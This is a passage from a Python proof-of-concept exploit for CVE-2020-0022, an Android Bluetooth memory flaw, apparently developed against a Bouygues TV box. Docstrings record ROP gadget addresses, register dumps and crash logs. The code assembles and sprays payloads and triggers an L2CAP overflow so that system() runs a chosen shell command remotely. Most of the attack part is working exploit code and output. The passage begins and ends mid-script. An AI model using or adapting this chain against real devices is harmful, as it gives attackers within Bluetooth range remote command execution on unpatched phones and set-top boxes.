          0x10 : b1d0db24 : 97e6b3f0 | 0x14 : b1d0db28 : b1d0db44 | 0x18 : b1d0db2c : 97e78f70 | 0x1c : b1d0db30 : 97d432e0
          0x20 : b1d0db34 : 97e1e9c8 | 0x24 : b1d0db38 : 97e8e3fc | 0x28 : b1d0db3c : 97dc38d4 | 0x2c : b1d0db40 : 97d432ec
          0x30 : b1d0db44 : 74737973 | 0x34 : b1d0db48 : 00006d65 | 0x38 : b1d0db4c : dead0004 | 0x3c : b1d0db50 : dead0005
          0x40 : b1d0db54 : dead0006 | 0x44 : b1d0db58 : dead0007 | 0x48 : b1d0db5c : dead0008 | 0x4c : b1d0db60 : dead0009
          0x50 : b1d0db64 : dead000a | 0x54 : b1d0db68 : dead000b | 0x58 : b1d0db6c : dead000c | 0x5c : b1d0db70 : dead000d
          0x60 : b1d0db74 : dead000e | 0x64 : b1d0db78 : dead000f | 0x68 : b1d0db7c : dead0010 | 0x6c : b1d0db80 : 20746163
          0x70 : b1d0db84 : 7665642f | 0x74 : b1d0db88 : 72657a2f | 0x78 : b1d0db8c : 207c206f | 0x7c : b1d0db90 : 6f686365
          0x80 : b1d0db94 : 61542720 | 0x84 : b1d0db98 : 74656772 | 0x88 : b1d0db9c : 70784520 | 0x8c : b1d0dba0 : 74696f6c
          0x90 : b1d0dba4 : 20276465 | 0x94 : b1d0dba8 : 642f203e | 0x98 : b1d0dbac : 2f617461 | 0x9c : b1d0dbb0 : 61636f6c
          0xa0 : b1d0dbb4 : 6d742f6c | 0xa4 : b1d0dbb8 : 76632f70 | 0xa8 : b1d0dbbc : 30322d65 | 0xac : b1d0dbc0 : 302d3032
          0xb0 : b1d0dbc4 : 2d323230 | 0xb4 : b1d0dbc8 : 00636f70
        Prepare to connect to the target via bluetooth with your smartphone
        HCI: Spraying second payload at 0xb1d0db14
        Connect to the target via bluetooth with your smartphone                                                                                                        
        HCI: Triggering the exploit with first payload... (1/3)
        ADB: Bluetooth deamon crashed (2/20)                                                                                                                            
        ADB: Found interesting crash !!!
        07-26 08:40:27.012  4154  4207 F libc    : Fatal signal 11 (SIGSEGV), code 1, fault addr 0xdead0008 in tid 4207 (bt_workqueue)
        07-26 08:40:27.230  4252  4252 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
        07-26 08:40:27.231  4252  4252 F DEBUG   : Build fingerprint: 'BouyguesTelecom/BouygtelTV/HMB4213H:8.0.0/CALIFORNIE/6.30.13:user/release-keys'
        07-26 08:40:27.231  4252  4252 F DEBUG   : Revision: '0'
        07-26 08:40:27.231  4252  4252 F DEBUG   : ABI: 'arm'
        07-26 08:40:27.231  4252  4252 F DEBUG   : pid: 4154, tid: 4207, name: bt_workqueue  >>> com.android.bluetooth <<<
        07-26 08:40:27.231  4252  4252 F DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xdead0008
        07-26 08:40:27.231  4252  4252 F DEBUG   :     r0 00006d65  r1 dead0004  r2 00000001  r3 b4618c09
        07-26 08:40:27.231  4252  4252 F DEBUG   :     r4 dead0005  r5 b1d0db24  r6 00000000  r7 b1d0db14
        07-26 08:40:27.232  4252  4252 F DEBUG   :     r8 dead0006  r9 b1d0db44  sl 96987338  fp 97e78f70
        07-26 08:40:27.232  4252  4252 F DEBUG   :     ip dead0007  sp 96986fd8  lr dead0008  pc dead0008  cpsr 00000010
        07-26 08:40:27.234  4252  4252 F DEBUG   : 
        07-26 08:40:27.234  4252  4252 F DEBUG   : backtrace:
        07-26 08:40:27.234  4252  4252 F DEBUG   :     #00 pc dead0008  <unknown>

        After gadget 7 the registers contains:
        
        - R0       = 00006d65       = second payload value + 0x34 = 'em' string + 2 NULL bytes
        - R1       = dead0004       = second payload value + 0x38
        - R2       = 00000001       = second payload value + 0x8  = RTLD_LAZY = 0x1
        - R3       = b4618c09       = system function address
        - R4       = dead0005       = second payload value + 0x3C
        - R5       = b1d0db24       = first payload value  + 0x8  = address of second payload + 0x10 = address for gadget 2
        - R7       = b1d0db14       = first payload value  + 0xC  = address of second payload + 0x0  = address of gadget 1
        - R8       = dead0006       = second payload value + 0x40
        - R9  (SB) = b1d0db44       = second payload value + 0x14 = address of second payload + 0x30 = address of 'system' string'
        - R12 (IP) = dead0007       = second payload value + 0x44
        - R14 (LR) = dead0008       = second payload value + 0x48
        - R15 (PC) = dead0008 + 0x1 = second payload value + 0x4C
        
        The system function take 1 paramater "const char *command":
        int system(const char *commande);
        
        We will later in the script place the shell command at the end of the second payload like this:
        
        - second payload value + len(second payload) - len(shell command) = shell command
        - address of shell command = address of second payload + len(second payload) - len(shell command)
        
        Where second payload length is 184 because we want to place the second payload in link transmit data buffer queue in order trigger the exploit

        In order to call system function we need to set R0 with the address of the shell command
        
        We need a gadget that:
        - Don't touch R3 with the system function address
        - Set R0 with the address of the shell command
        - Control LR and PC
        
        Gadget 8:
        0x000a4698 : ldmib r4, {r0, r2, ip, lr, pc} ^
        
        By setting R4 to second payload value + 0x38 - 0x4 for the increment before this gadget will load:
        
        - R4       = R4 + 0x0  = second payload value + 0x38 - 0x4
        - R0       = R4 + 0x4  = second payload value + 0x38
        - R2       = R4 + 0x8  = second payload value + 0x3C = address to load in gadget 8
        - R12 (IP) = R4 + 0xC  = second payload value + 0x40
        - R14 (LR) = R4 + 0x10 = second payload value + 0x44 = IP of gadget 7
        - R15 (PC) = R4 + 0x14 = second payload value + 0x48 = LR of gadget 7
        
        Reminder for gadget 7:
        0x000f09c8 : ldmib sb, {r0, r1, r4, r8, ip, lr, pc} ^
        """
        
        # Set PC for gadget 7: Place the address gadget 7 in second payload value + 0x4C
        set_ptr( second_payload_ptr, 0x4C, bluetooth_library_base_address + 0x000a4698, payload=2)
        
        # Set R4 for gadget 8: Place the address of second payload value + 0x38 - 0x4 for the increment before in second payload value + 0x3C
        set_ptr( second_payload_ptr, 0x3C, second_payload_base + 0x38 - 0x4, payload=2)
        
        # Compute the shell command address from address of second payload + len(second payload) - len(shell command)
        shell_command_address = second_payload_base + 184 - len(shell_command)
        print_console ("\033[;32mAdding shell command \"%s\" of length %d at 0x%8x in second payload\033[;0m" % (shell_command, len(shell_command), shell_command_address))

        # Set R0 with address of shell command: Place the address of shell command in second payload value + 0x38
        set_ptr( second_payload_ptr, 0x38, shell_command_address, payload=2)
        
        """
        The target crash with following log:
        
        HCI: Got ACL connection handle: 0xb                                                                                                                             
        HCI: Getting link transmit data buffer queue pointer...
        Found link transmit data buffer queue pointer 0 at 0xaf28dbc4
        HCI: Getting bluetooth library function pointers...
        HCI: Found SetDataAdvDataSender function at 0x951bfb29
        HCI: Found bte_hh_evt function at 0x95162429
        HCI: Found bluetooth library base address at 0x950ea000
        Building the payloads...
        Adding shell command "touch /data/local/tmp/test" of length 28 at 0xaf28dbb0 in second payload
        First payload:
          0x00: dead0000 | 0x04: af28db14 | 0x08: af28db24 | 0x0c: af28db14
          0x10: 9518c098 | 0x14: dead0001 | 0x18: dead0002 | 0x1c: dead0003
        Second payload:
          0x00 : af28db14 : 9518ca38 | 0x04 : af28db18 : 00000000 | 0x08 : af28db1c : 00000001 | 0x0c : af28db20 : af28db18
          0x10 : af28db24 : 952273f0 | 0x14 : af28db28 : af28db44 | 0x18 : af28db2c : 95234f70 | 0x1c : af28db30 : 950ff2e0
          0x20 : af28db34 : 951da9c8 | 0x24 : af28db38 : 9524a3fc | 0x28 : af28db3c : 9517f8d4 | 0x2c : af28db40 : 950ff2ec
          0x30 : af28db44 : 74737973 | 0x34 : af28db48 : 00006d65 | 0x38 : af28db4c : af28dbb0 | 0x3c : af28db50 : af28db48
          0x40 : af28db54 : dead0004 | 0x44 : af28db58 : dead0005 | 0x48 : af28db5c : dead0006 | 0x4c : af28db60 : 9518e698
          0x50 : af28db64 : dead0007 | 0x54 : af28db68 : dead0008 | 0x58 : af28db6c : dead0009 | 0x5c : af28db70 : dead000a
          0x60 : af28db74 : dead000b | 0x64 : af28db78 : dead000c | 0x68 : af28db7c : dead000d | 0x6c : af28db80 : dead000e
          0x70 : af28db84 : dead000f | 0x74 : af28db88 : dead0010 | 0x78 : af28db8c : dead0011 | 0x7c : af28db90 : dead0012
          0x80 : af28db94 : dead0013 | 0x84 : af28db98 : dead0014 | 0x88 : af28db9c : dead0015 | 0x8c : af28dba0 : dead0016
          0x90 : af28dba4 : dead0017 | 0x94 : af28dba8 : dead0018 | 0x98 : af28dbac : dead0019 | 0x9c : af28dbb0 : 63756f74
          0xa0 : af28dbb4 : 642f2068 | 0xa4 : af28dbb8 : 2f617461 | 0xa8 : af28dbbc : 61636f6c | 0xac : af28dbc0 : 6d742f6c
          0xb0 : af28dbc4 : 65742f70 | 0xb4 : af28dbc8 : 00007473
        Prepare to connect to the target via bluetooth with your smartphone
        HCI: Spraying second payload at 0xaf28db14
        Connect to the target via bluetooth with your smartphone                                                                                                        
        HCI: Triggering the exploit with first payload... (1/3)
        ADB: Bluetooth deamon crashed (5/20)                                                                                                                            
        ADB: Found interesting crash !!!
        07-26 16:42:26.747  4482  4516 F libc    : Fatal signal 11 (SIGSEGV), code 1, fault addr 0xdead0004 in tid 4516 (bt_workqueue)
        07-26 16:42:26.927  4569  4569 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
        07-26 16:42:26.927  4569  4569 F DEBUG   : Build fingerprint: 'BouyguesTelecom/BouygtelTV/HMB4213H:8.0.0/CALIFORNIE/6.30.13:user/release-keys'
        07-26 16:42:26.928  4569  4569 F DEBUG   : Revision: '0'
        07-26 16:42:26.928  4569  4569 F DEBUG   : ABI: 'arm'
        07-26 16:42:26.928  4569  4569 F DEBUG   : pid: 4482, tid: 4516, name: bt_workqueue  >>> com.android.bluetooth <<<
        07-26 16:42:26.928  4569  4569 F DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xdead0004
        07-26 16:42:26.928  4569  4569 F DEBUG   :     r0 af28dbb0  r1 af28dbb0  r2 af28db48  r3 afcd5c09
        07-26 16:42:26.928  4569  4569 F DEBUG   :     r4 af28db48  r5 af28db24  r6 00000000  r7 af28db14
        07-26 16:42:26.928  4569  4569 F DEBUG   :     r8 dead0004  r9 af28db44  sl 93efd338  fp 95234f70
        07-26 16:42:26.928  4569  4569 F DEBUG   :     ip dead0004  sp 93efcfd8  lr dead0005  pc dead0004  cpsr 00000010
        07-26 16:42:26.931  4569  4569 F DEBUG   : 
        07-26 16:42:26.931  4569  4569 F DEBUG   : backtrace:
        07-26 16:42:26.931  4569  4569 F DEBUG   :     #00 pc dead0004  <unknown>
        07-26 16:42:26.931  4569  4569 F DEBUG   :     #01 pc dead0003  <unknown>

        In gadget 8 the registers contains:
        
        - R0       = af28dbb0       = second payload value + 0x38 = address of the shell command
        - R1       = af28dbb0       = second payload value + 0x38 = address of the shell command
        - R2       = af28db48       = second payload value + 0x3C = address of second payload value + 0x34 = 'em' string + 2 NULL bytes
        - R3       = afcd5c09       = system function address
        - R4       = af28db48       = second payload value + 0x3C = address of second payload value + 0x34 = 'em' string + 2 NULL bytes
        - R5       = af28db24       = first payload value  + 0x8  = address of second payload + 0x10 = address for gadget 2
        - R7       = af28db14       = first payload value  + 0xC  = address of second payload + 0x0  = address of gadget 1
        - R8       = dead0004       = second payload value + 0x40
        - R9  (SB) = af28db44       = second payload value + 0x14 = address of second payload + 0x30 = address of 'system' string'
        - R12 (IP) = dead0004       = second payload value + 0x40
        - R14 (LR) = dead0005       = second payload value + 0x44
        - R15 (PC) = dead0004 + 0x2 = second payload value + 0x48

        We have R0 with address of the shell command and R3 with the shell command pointed by R0
        
        We can now call system function with the shell command as parameter

        For this we need a gadget that branch to R3

        Gadget 9:
        0x00015c70 : blx r3 ; sub sp, fp, #4 ; pop {fp, pc}
        
        Reminder for gadget 7:
        0x000f09c8 : ldmib sb, {r0, r1, r4, r8, ip, lr, pc} ^

        Reminder for gadget 8:
        0x000a4698 : ldmib r4, {r0, r2, ip, lr, pc} ^
        """
        
        # Set PC for gadget 8: Place the address gadget 8 in second payload value + 0x48
        set_ptr( second_payload_ptr, 0x48, bluetooth_library_base_address + 0x00015c70, payload=2)
        
        """
        The target crash with following log:
        
        HCI: Got ACL connection handle: 0xb                                                                                                                             
        HCI: Getting link transmit data buffer queue pointer...
        Found link transmit data buffer queue pointer 0 at 0xb010dbc4
        HCI: Getting bluetooth library function pointers...
        HCI: Found SetDataAdvDataSender function at 0x9607db29
        HCI: Found bte_hh_evt function at 0x96020429
        HCI: Found bluetooth library base address at 0x95fa8000
        Building the payloads...
        Adding shell command "touch /data/local/tmp/test" of length 28 at 0xb010dbb0 in second payload
        First payload:
          0x00: dead0000 | 0x04: b010db14 | 0x08: b010db24 | 0x0c: b010db14
          0x10: 9604a098 | 0x14: dead0001 | 0x18: dead0002 | 0x1c: dead0003
        Second payload:
          0x00 : b010db14 : 9604aa38 | 0x04 : b010db18 : 00000000 | 0x08 : b010db1c : 00000001 | 0x0c : b010db20 : b010db18
          0x10 : b010db24 : 960e53f0 | 0x14 : b010db28 : b010db44 | 0x18 : b010db2c : 960f2f70 | 0x1c : b010db30 : 95fbd2e0
          0x20 : b010db34 : 960989c8 | 0x24 : b010db38 : 961083fc | 0x28 : b010db3c : 9603d8d4 | 0x2c : b010db40 : 95fbd2ec
          0x30 : b010db44 : 74737973 | 0x34 : b010db48 : 00006d65 | 0x38 : b010db4c : b010dbb0 | 0x3c : b010db50 : b010db48
          0x40 : b010db54 : dead0004 | 0x44 : b010db58 : dead0005 | 0x48 : b010db5c : 95fbdc70 | 0x4c : b010db60 : 9604c698
          0x50 : b010db64 : dead0006 | 0x54 : b010db68 : dead0007 | 0x58 : b010db6c : dead0008 | 0x5c : b010db70 : dead0009
          0x60 : b010db74 : dead000a | 0x64 : b010db78 : dead000b | 0x68 : b010db7c : dead000c | 0x6c : b010db80 : dead000d
          0x70 : b010db84 : dead000e | 0x74 : b010db88 : dead000f | 0x78 : b010db8c : dead0010 | 0x7c : b010db90 : dead0011
          0x80 : b010db94 : dead0012 | 0x84 : b010db98 : dead0013 | 0x88 : b010db9c : dead0014 | 0x8c : b010dba0 : dead0015
          0x90 : b010dba4 : dead0016 | 0x94 : b010dba8 : dead0017 | 0x98 : b010dbac : dead0018 | 0x9c : b010dbb0 : 63756f74
          0xa0 : b010dbb4 : 642f2068 | 0xa4 : b010dbb8 : 2f617461 | 0xa8 : b010dbbc : 61636f6c | 0xac : b010dbc0 : 6d742f6c
          0xb0 : b010dbc4 : 65742f70 | 0xb4 : b010dbc8 : 00007473
        Prepare to connect to the target via bluetooth with your smartphone
        HCI: Spraying second payload at 0xb010db14
        Connect to the target via bluetooth with your smartphone                                                                                                        
        HCI: Triggering the exploit with first payload... (1/3)
        ADB: Bluetooth deamon crashed (6/20)                                                                                                                            
        ADB: Found interesting crash !!!
        07-26 16:49:39.639  4474  4509 F libc    : Fatal signal 11 (SIGSEGV), code 1, fault addr 0xe9d5d118 in tid 4509 (bt_workqueue)
        07-26 16:49:39.790  4566  4566 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
        07-26 16:49:39.791  4566  4566 F DEBUG   : Build fingerprint: 'BouyguesTelecom/BouygtelTV/HMB4213H:8.0.0/CALIFORNIE/6.30.13:user/release-keys'
        07-26 16:49:39.791  4566  4566 F DEBUG   : Revision: '0'
        07-26 16:49:39.791  4566  4566 F DEBUG   : ABI: 'arm'
        07-26 16:49:39.791  4566  4566 F DEBUG   : pid: 4474, tid: 4509, name: bt_workqueue  >>> com.android.bluetooth <<<
        07-26 16:49:39.791  4566  4566 F DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xe9d5d118
        07-26 16:49:39.791  4566  4566 F DEBUG   :     r0 00000100  r1 00000000  r2 b3b75987  r3 94d01f20
        07-26 16:49:39.791  4566  4566 F DEBUG   :     r4 b010db48  r5 b010db24  r6 00000000  r7 b010db14
        07-26 16:49:39.791  4566  4566 F DEBUG   :     r8 dead0004  r9 b010db44  sl 94d02338  fp 2801003e
        07-26 16:49:39.792  4566  4566 F DEBUG   :     ip 94d01f48  sp 960f2f74  lr b1aed2f1  pc e9d5d118  cpsr 60000010
        07-26 16:49:39.795  4566  4566 F DEBUG   : 
        07-26 16:49:39.795  4566  4566 F DEBUG   : backtrace:
        07-26 16:49:39.796  4566  4566 F DEBUG   :     #00 pc e9d5d118  <unknown>
        07-26 16:49:39.796  4566  4566 F DEBUG   :     #01 pc 000212ed  /system/lib/libc.so (sigaction+88)

        After gadget 8 that call the system function with the shell command the registers contains:
        
        - R0       = 00000100 = system function return value
        - R4       = b010db48 = second payload value + 0x3C = address of second payload value + 0x34 = 'em' string + 2 NULL bytes
        - R5       = b010db24 = first payload value  + 0x8  = address of second payload + 0x10 = address for gadget 2
        - R7       = b010db14 = first payload value  + 0xC  = address of second payload + 0x0  = address of gadget 1
        - R8       = dead0004 = second payload value + 0x40
        - R9  (SB) = b010db44 = second payload value + 0x14 = address of second payload + 0x30 = address of 'system' string'
        - R15 (PC) = e9d5d118

        The R0 register contains the return status of the system function execution with the shell command
        This status contains usefull informations on the execution of the system function accessible with wait macros

        WIFEXITED(status):
            returns true if the child terminated normally, that is, by calling exit(3) or _exit(2), or by returning from main(). 
            
        WEXITSTATUS(status):
            returns the exit status of the child.
            This consists of the least significant 8 bits of the status argument that the child specified in a call to exit(3) or _exit(2) or as the argument for a return statement in main().
            This macro should only be employed if WIFEXITED returned true. 

        #define	_W_INT(i)	(i)
        #define	_WSTATUS(x)	(_W_INT(x) & 0177)
        #define WIFEXITED(x)	(_WSTATUS(x) == 0)
        #define WEXITSTATUS(x)	(_W_INT(x) >> 8)

        To get the status of the system function we need to use _WSTATUS(status):
        _WSTATUS(0x00000100) = 0x00000100 & 0177 = 0

        The status of the system function execution is 0

        To check if the system function exited successfuly we need to use WIFEXITED(status):
        WIFEXITED(0x00000100) = (_WSTATUS(0x00000100) == 0) = True
        
        The system function exited normally
        
        To obtain the exit status of system function we need to use WEXITSTATUS(status):
        WEXITSTATUS(0x00000100) = 0x00000100 >> 8 = 1

        The exit status value can be:
        #define EXIT_SUCCESS 0
        #define EXIT_FAILURE 1

        The exit status is EXIT_FAILURE which mean the system function failed
        This due to SELinux which don't allow the bluetooth deamon to write a file in /data/local/tmp/cve-2020-0022-poc
        
        
        The same crash with a shell command allowed to run give R0 = 0x00000000 which mean EXIT_SUCCESS:
        
        HCI: Got ACL connection handle: 0xb                                                                                                                             
        HCI: Getting link transmit data buffer queue pointer...
        Found link transmit data buffer queue pointer 0 at 0xad38dbc4
        HCI: Getting bluetooth library function pointers...
        HCI: Found bte_hh_evt function at 0x93339429
        HCI: Found bluetooth library base address at 0x932c1000
        Building the payloads...
        Adding shell command "touch /sdcard/Download/cve-2020-0002-poc" of length 44 at 0xad38dba0 in second payload
        First payload:
          0x00: dead0000 | 0x04: ad38db14 | 0x08: ad38db24 | 0x0c: ad38db14
          0x10: 93363098 | 0x14: dead0001 | 0x18: dead0002 | 0x1c: dead0003
        Second payload:
          0x00 : ad38db14 : 93363a38 | 0x04 : ad38db18 : 00000000 | 0x08 : ad38db1c : 00000001 | 0x0c : ad38db20 : ad38db18
          0x10 : ad38db24 : 933fe3f0 | 0x14 : ad38db28 : ad38db44 | 0x18 : ad38db2c : 9340bf70 | 0x1c : ad38db30 : 932d62e0
          0x20 : ad38db34 : 933b19c8 | 0x24 : ad38db38 : 934213fc | 0x28 : ad38db3c : 933568d4 | 0x2c : ad38db40 : 932d62ec
          0x30 : ad38db44 : 74737973 | 0x34 : ad38db48 : 00006d65 | 0x38 : ad38db4c : ad38dba0 | 0x3c : ad38db50 : ad38db48
          0x40 : ad38db54 : dead0004 | 0x44 : ad38db58 : dead0005 | 0x48 : ad38db5c : 932d6c70 | 0x4c : ad38db60 : 93365698
          0x50 : ad38db64 : dead0006 | 0x54 : ad38db68 : dead0007 | 0x58 : ad38db6c : dead0008 | 0x5c : ad38db70 : dead0009
          0x60 : ad38db74 : dead000a | 0x64 : ad38db78 : dead000b | 0x68 : ad38db7c : dead000c | 0x6c : ad38db80 : dead000d
          0x70 : ad38db84 : dead000e | 0x74 : ad38db88 : dead000f | 0x78 : ad38db8c : dead0010 | 0x7c : ad38db90 : dead0011
          0x80 : ad38db94 : dead0012 | 0x84 : ad38db98 : dead0013 | 0x88 : ad38db9c : dead0014 | 0x8c : ad38dba0 : 63756f74
          0x90 : ad38dba4 : 732f2068 | 0x94 : ad38dba8 : 72616364 | 0x98 : ad38dbac : 6f442f64 | 0x9c : ad38dbb0 : 6f6c6e77
          0xa0 : ad38dbb4 : 632f6461 | 0xa4 : ad38dbb8 : 322d6576 | 0xa8 : ad38dbbc : 2d303230 | 0xac : ad38dbc0 : 32303030
          0xb0 : ad38dbc4 : 636f702d | 0xb4 : ad38dbc8 : 00000000
        Prepare to connect to the target via bluetooth with your smartphone
        HCI: Spraying second payload at 0xad38db14
        Connect to the target via bluetooth with your smartphone                                                                                                        
        HCI: Triggering the exploit with first payload... (1/3)
        ADB: Bluetooth deamon crashed (2/20)                                                                                                                            
        ADB: Found interesting crash !!!
        08-24 15:29:30.788  2898  3003 F libc    : Fatal signal 11 (SIGSEGV), code 1, fault addr 0xe9d5d118 in tid 3003 (bt_workqueue)
        08-24 15:29:30.994  3217  3217 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
        08-24 15:29:30.994  3217  3217 F DEBUG   : Build fingerprint: 'BouyguesTelecom/BouygtelTV/HMB4213H:8.0.0/CALIFORNIE/6.30.13:user/release-keys'
        08-24 15:29:30.994  3217  3217 F DEBUG   : Revision: '0'
        08-24 15:29:30.994  3217  3217 F DEBUG   : ABI: 'arm'
        08-24 15:29:30.994  3217  3217 F DEBUG   : pid: 2898, tid: 3003, name: bt_workqueue  >>> com.android.bluetooth <<<
        08-24 15:29:30.995  3217  3217 F DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xe9d5d118
        08-24 15:29:30.995  3217  3217 F DEBUG   :     r0 00000000  r1 00000000  r2 bc804d9e  r3 92106f20
        08-24 15:29:30.995  3217  3217 F DEBUG   :     r4 ad38db48  r5 ad38db24  r6 00000000  r7 ad38db14
        08-24 15:29:30.995  3217  3217 F DEBUG   :     r8 dead0004  r9 ad38db44  sl 92107338  fp 2801003e
        08-24 15:29:30.995  3217  3217 F DEBUG   :     ip 92106f48  sp 9340bf74  lr af12b2f1  pc e9d5d118  cpsr 60000010
        08-24 15:29:30.998  3217  3217 F DEBUG   : 
        08-24 15:29:30.998  3217  3217 F DEBUG   : backtrace:
        08-24 15:29:30.998  3217  3217 F DEBUG   :     #00 pc e9d5d118  <unknown>
        08-24 15:29:30.999  3217  3217 F DEBUG   :     #01 pc 000212ed  /system/lib/libc.so (sigaction+88)
        
        The ROP chain can continue to handle the system function return but there is no need because the deamon crash and restart automaticaly
        
        The shell command can be 26 bytes = 104 characters long because the ROP chain take 20 bytes and the second payload is 184 characters = 46 bytes long
        
        """
        
        # No need for first payload packet to exceed a length of 32 characters because of memcpy of -2
        # Place some 0xdead000x debug marks in first payload
        debug_dead = 0
        for i in xrange(32/4):
            try:
                if not first_payload_ptr[i]:
                    first_payload_ptr[i] = 0xdead0000 + debug_dead
                    debug_dead += 1
            except:
                first_payload_ptr.append(0xdead0000 + debug_dead)
                debug_dead += 1

        # Pack the first payload
        first_payload = struct.pack("I" * len(first_payload_ptr), *first_payload_ptr)

        # Print the first payload
        print_console ("\033[;32mFirst payload:\033[;0m")
        for i in xrange(32/4):
            if i % 4 == 0 and i <> 32/4:
                print_console ("\033[;32m  0x%02x: %08x | 0x%02x: %08x | 0x%02x: %08x | 0x%02x: %08x\033[;0m" % ((i + 0) * 4, first_payload_ptr[i + 0], \
                                                                                                                 (i + 1) * 4, first_payload_ptr[i + 1], \
                                                                                                                 (i + 2) * 4, first_payload_ptr[i + 2], \
                                                                                                                 (i + 3) * 4, first_payload_ptr[i + 3]))
        
        # Second payload must have a length of 184 characters to be place at the found link transmit data buffer queue address - 0xb0
        # Place some 0xdead000x debug marks in second payload
        for i in xrange((184 - len(shell_command)) / 4):
            try:
                # Allow NULL in second payload value + 0x4 for dlopen function (0x4 / 0x4 = 1)
                if i <> 1 and not second_payload_ptr[i]:
                    second_payload_ptr[i] = 0xdead0000 + debug_dead
                    debug_dead += 1
            except:
                second_payload_ptr.append(0xdead0000 + debug_dead)
                debug_dead += 1
        
        # Pack the second payload
        second_payload = struct.pack("I" * len(second_payload_ptr), *second_payload_ptr)
        
        # Place shell command at end of second payload
        second_payload += shell_command
                
        # Print the second payload
        print_console ("\033[;32mSecond payload:\033[;0m")
        for i in xrange(((184 - 8) / 4)):
            if (i % 4 == 0):
                print_console ("\033[;32m  0x%02x : %08x : %s | 0x%02x : %08x : %s | 0x%02x : %08x : %s | 0x%02x : %08x : %s\033[;0m" % (i * 4, \
                                                                                                                                         second_payload_base + (i + 0) * 4, convert_little_endian(second_payload[(i + 0) * 4:4 +(i + 0) * 4]), \
                                                                                                                                         (i + 1) * 4, \
                                                                                                                                         second_payload_base + (i + 1) * 4, convert_little_endian(second_payload[(i + 1) * 4:4 +(i + 1) * 4]), \
                                                                                                                                         (i + 2) * 4, \
                                                                                                                                         second_payload_base + (i + 2) * 4, convert_little_endian(second_payload[(i + 2) * 4:4 +(i + 2) * 4]), \
                                                                                                                                         (i + 3) * 4, \
                                                                                                                                         second_payload_base + (i + 3) * 4, convert_little_endian(second_payload[(i + 3) * 4:4 +(i + 3) * 4])))
        i += 1
        print_console ("\033[;32m  0x%02x : %08x : %s | 0x%02x : %08x : %s\033[;0m" % (i * 4, \
                                                                                       second_payload_base + (i + 0) * 4, convert_little_endian(second_payload[(i + 0) * 4:4 + (i + 0) * 4]), \
                                                                                       (i + 1) * 4, \
                                                                                       second_payload_base + (i + 1) * 4, convert_little_endian(second_payload[(i + 1) * 4:4 + (i + 1) * 4])))

        # Time to prepare to connect target with a smartphone => Print a help message ;)
        print_console ("\033[;34mPrepare to connect to the target via bluetooth with your smartphone\033[;0m")
        
        # Overflow loop
        hci_overflow_counter = 0
        while hci_overflow_counter < max_hci_overflow_count:
            # Update vars
            hci_overflow_counter += 1

            # Check if target is ready for exploit
            if hci_overflow_counter >= 1 and not check_target_ready():
                # Check if adb activated
                if adb_activated:
                    # Wait a bit to make sure adb see the crash
                    time.sleep(5)

                    # Check if target crashed by overflow
                    if adb_target_crashed:
                        # Check if it's an interesting crash
                        if adb_interesting_crash:
                            print_console ("\033[;32mOverflow success after reconnect !!!\033[;0m")
                            sys.exit(0)
                        else:
                            print_console ("\033[;31mTarget crashed by overflow after reconnect !!!\033[;0m")
                            
                        # Reset target crashed and interesting carsh
                        adb_target_crashed = False
                        adb_interesting_crash = False
                    
                    # Bluetooth deamon crashed
                    do_crash_bluetooth_deamon(spray_packet=False)                   
                    break
                    
                else:
                    # Target not more ready but no adb to check what's happened => Target crashed by overflow !!!
                    print_console ("\033[;31mTarget crashed by overflow after reconnect !!!\033[;0m")
                    sys.exit(0)

            # Spray the payload at mem_offset 184 to overwrite link transmit data buffer queue at found address
            print_console ("\033[;32mHCI: Spraying second payload at 0x%08x\033[;0m" % second_payload_base)
            do_spray_packet_second_payload(second_payload)
            
            # Check if target is ready for exploit
            if not check_target_ready():
                # Check if adb activated
                if adb_activated:
                    # Wait a bit to make sure adb see the crash
                    time.sleep(5)

                    # Check if target crashed by overflow
                    if adb_target_crashed:
                        # Check if it's an interesting crash
                        if adb_interesting_crash:
                            print_console ("\033[;32mOverflow success after spraying second payload !!!\033[;0m")
                            sys.exit(0)
                        else:
                            print_console ("\033[;31mTarget crashed by overflow after spraying second payload !!!\033[;0m")
                            
                        # Reset target crashed and interesting carsh
                        adb_target_crashed = False
                        adb_interesting_crash = False
                    
                    # Bluetooth deamon crashed
                    do_crash_bluetooth_deamon(spray_packet=False)                   
                    break
                    
                else:
                    # Target not more ready but no adb to check what's happened => Target crashed by overflow !!!
                    print_console ("\033[;31mTarget crashed by overflow after spraying second payload !!!\033[;0m")
                    sys.exit(0)

            # Print helper massage ;)
            print_console ("\033[;34mConnect to the target via bluetooth with your smartphone\033[;0m")
            
            # Send fragmented packets containing payload base address with l2cap adjust of 2 bytes to overflow
            print_console ("HCI: Triggering the exploit with first payload... (%d/%d)" % (hci_overflow_counter, max_hci_overflow_count))
            overflow_result = do_overflow_first_payload(first_payload)

            # Check overflow result and target still ready
            if overflow_result or not check_target_ready():
                # Check if adb activated
                if adb_activated:
                    # Wait a bit to make sure adb see the crash
                    time.sleep(5)
                    
                    # Check if target crashed by overflow
                    if adb_target_crashed:
                        # Check if it's an interesting crash
                        if adb_interesting_crash:
                            print_console ("\033[;32mOverflow success !!!\033[;0m")
                            sys.exit(0)
                        else:
                            print_console ("\033[;31mTarget crashed by overflow !!!\033[;0m")
                            
                        # Reset target crashed and interesting carsh
                        adb_target_crashed = False
                        adb_interesting_crash = False
                    
                    # Bluetooth deamon crashed
                    do_crash_bluetooth_deamon(spray_packet=False)                   
                    break
                    
                else:
                    # Target not more ready but no adb to check what's happened => Target crashed by overflow !!!
                    print_console ("\033[;31mTarget crashed by overflow !!!\033[;0m")
                    sys.exit(0)

            # Disconnect L2CAP socket may sometime trigger the overflow
            do_disconnect_l2cap(timeout=2)

            # Check if adb activated
            if adb_activated:
                # Check if target crashed by overflow
                if adb_target_crashed:
                    # Check if it's an interesting crash
                    if adb_interesting_crash:
                        print_console ("\033[;32mOverflow success after disconnect !!!\033[;0m")
                        sys.exit(0)
                    else:
                        print_console ("\033[;31mTarget crashed by overflow after disconnect !!!\033[;0m")
                        
                    # Reset target crashed and interesting carsh
